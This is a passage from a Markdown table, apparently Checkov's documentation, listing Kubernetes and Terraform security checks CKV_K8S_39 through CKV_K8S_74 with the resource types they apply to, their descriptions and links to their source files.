[AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2914 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2915 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2916 | CKV_K8S_40 | resource | CronJob | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2917 | CKV_K8S_40 | resource | DaemonSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2918 | CKV_K8S_40 | resource | Deployment | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2919 | CKV_K8S_40 | resource | Job | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2920 | CKV_K8S_40 | resource | Pod | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2921 | CKV_K8S_40 | resource | ReplicaSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2922 | CKV_K8S_40 | resource | ReplicationController | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2923 | CKV_K8S_40 | resource | StatefulSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2924 | CKV_K8S_41 | resource | ServiceAccount | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py) | +| 2925 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 2926 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 2927 | CKV_K8S_42 | resource | ClusterRoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | +| 2928 | CKV_K8S_42 | resource | RoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | +| 2929 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2930 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2931 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2932 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2933 | CKV_K8S_43 | resource | CronJob | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2934 | CKV_K8S_43 | resource | DaemonSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2935 | CKV_K8S_43 | resource | Deployment | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2936 | CKV_K8S_43 | resource | DeploymentConfig | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2937 | CKV_K8S_43 | resource | Job | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2938 | CKV_K8S_43 | resource | Pod | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2939 | CKV_K8S_43 | resource | PodTemplate | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2940 | CKV_K8S_43 | resource | ReplicaSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2941 | CKV_K8S_43 | resource | ReplicationController | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2942 | CKV_K8S_43 | resource | StatefulSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2943 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2944 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2945 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2946 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2947 | CKV_K8S_44 | resource | Service | Ensure that the Tiller Service (Helm v2) is deleted | Kubernetes | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py) | +| 2948 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 2949 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 2950 | CKV_K8S_45 | resource | CronJob | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2951 | CKV_K8S_45 | resource | DaemonSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2952 | CKV_K8S_45 | resource | Deployment | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2953 | CKV_K8S_45 | resource | DeploymentConfig | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2954 | CKV_K8S_45 | resource | Job | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2955 | CKV_K8S_45 | resource | Pod | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2956 | CKV_K8S_45 | resource | PodTemplate | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2957 | CKV_K8S_45 | resource | ReplicaSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2958 | CKV_K8S_45 | resource | ReplicationController | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2959 | CKV_K8S_45 | resource | StatefulSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2960 | CKV_K8S_49 | resource | ClusterRole | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | +| 2961 | CKV_K8S_49 | resource | Role | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | +| 2962 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2963 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2964 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2965 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2966 | CKV_K8S_68 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2967 | CKV_K8S_68 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2968 | CKV_K8S_68 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2969 | CKV_K8S_68 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2970 | CKV_K8S_68 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2971 | CKV_K8S_68 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2972 | CKV_K8S_68 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2973 | CKV_K8S_68 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2974 | CKV_K8S_68 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2975 | CKV_K8S_68 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2976 | CKV_K8S_69 | resource | CronJob | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2977 | CKV_K8S_69 | resource | DaemonSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2978 | CKV_K8S_69 | resource | Deployment | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2979 | CKV_K8S_69 | resource | DeploymentConfig | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2980 | CKV_K8S_69 | resource | Job | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2981 | CKV_K8S_69 | resource | Pod | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2982 | CKV_K8S_69 | resource | PodTemplate | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2983 | CKV_K8S_69 | resource | ReplicaSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2984 | CKV_K8S_69 | resource | ReplicationController | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2985 | CKV_K8S_69 | resource | StatefulSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2986 | CKV_K8S_70 | resource | CronJob | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2987 | CKV_K8S_70 | resource | DaemonSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2988 | CKV_K8S_70 | resource | Deployment | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2989 | CKV_K8S_70 | resource | DeploymentConfig | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2990 | CKV_K8S_70 | resource | Job | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2991 | CKV_K8S_70 | resource | Pod | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2992 | CKV_K8S_70 | resource | PodTemplate | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2993 | CKV_K8S_70 | resource | ReplicaSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2994 | CKV_K8S_70 | resource | ReplicationController | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2995 | CKV_K8S_70 | resource | StatefulSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2996 | CKV_K8S_71 | resource | CronJob | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 2997 | CKV_K8S_71 | resource | DaemonSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 2998 | CKV_K8S_71 | resource | Deployment | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 2999 | CKV_K8S_71 | resource | DeploymentConfig | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3000 | CKV_K8S_71 | resource | Job | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3001 | CKV_K8S_71 | resource | Pod | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3002 | CKV_K8S_71 | resource | PodTemplate | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3003 | CKV_K8S_71 | resource | ReplicaSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3004 | CKV_K8S_71 | resource | ReplicationController | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3005 | CKV_K8S_71 | resource | StatefulSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3006 | CKV_K8S_72 | resource | CronJob | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3007 | CKV_K8S_72 | resource | DaemonSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3008 | CKV_K8S_72 | resource | Deployment | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3009 | CKV_K8S_72 | resource | DeploymentConfig | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3010 | CKV_K8S_72 | resource | Job | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3011 | CKV_K8S_72 | resource | Pod | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3012 | CKV_K8S_72 | resource | PodTemplate | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3013 | CKV_K8S_72 | resource | ReplicaSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3014 | CKV_K8S_72 | resource | ReplicationController | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3015 | CKV_K8S_72 | resource | StatefulSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3016 | CKV_K8S_73 | resource | CronJob | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3017 | CKV_K8S_73 | resource | DaemonSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3018 | CKV_K8S_73 | resource | Deployment | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3019 | CKV_K8S_73 | resource | DeploymentConfig | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3020 | CKV_K8S_73 | resource | Job | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3021 | CKV_K8S_73 | resource | Pod | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3022 | CKV_K8S_73 | resource | PodTemplate | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3023 | CKV_K8S_73 | resource | ReplicaSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3024 | CKV_K8S_73 | resource | ReplicationController | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3025 | CKV_K8S_73 | resource | StatefulSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3026 | CKV_K8S_74 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3027 | CKV_K8S_74 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 